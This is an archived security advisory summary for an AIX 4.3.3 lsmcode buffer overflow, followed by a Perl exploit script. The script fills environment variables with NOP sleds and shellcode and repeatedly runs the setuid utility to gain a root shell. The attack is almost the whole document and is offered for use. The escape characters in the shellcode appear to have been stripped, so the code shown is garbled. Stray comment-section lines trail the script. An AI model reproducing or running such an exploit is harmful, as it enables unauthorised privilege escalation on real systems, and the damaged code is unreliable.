source: http://www.securityfocus.com/bid/7871/info
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested : on Aix4.3.3.Mybe can work on other versions.
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-6-1
# Announce: use as your owner risk!
$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;
$XID="x03";
$UID="x97";
print "nnExploit $CMD for Aix 4.3.3 to get uid=0 shell.n";
print "From: [ www.xfocus.org 2003-6-1 ].nn";
$NOP="x7cxa5x2ax79"x800;
%ENV=();
$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="x2fxf2x2ax2f"x300;
$ret = system $CMD ,"-d","a";
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="A"x $j ."x2fxf2x2ax2f"x300;
$ret = system $CMD ,"-d","a";
}
}
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="x7ex94xa2x79x7ex84xa3x78x40x82xffxfd";
$SHELL.="x7exa8x02xa6x3axb5x01x40x88x55xfexe0";
$SHELL.="x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$SHELL.="x4cxc6x33x42x44xffxffx02$GID$XIDxffxff";
$SHELL.="x38x75xffx04x38x95xffx0cx7ex85xa3x78";
$SHELL.="x90x75xffx0cx92x95xffx10x88x55xfexe1";
$SHELL.="x9ax95xffx0bx4bxffxffxd8/bin/shxff";
return $SHELL;
}
#EOF
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666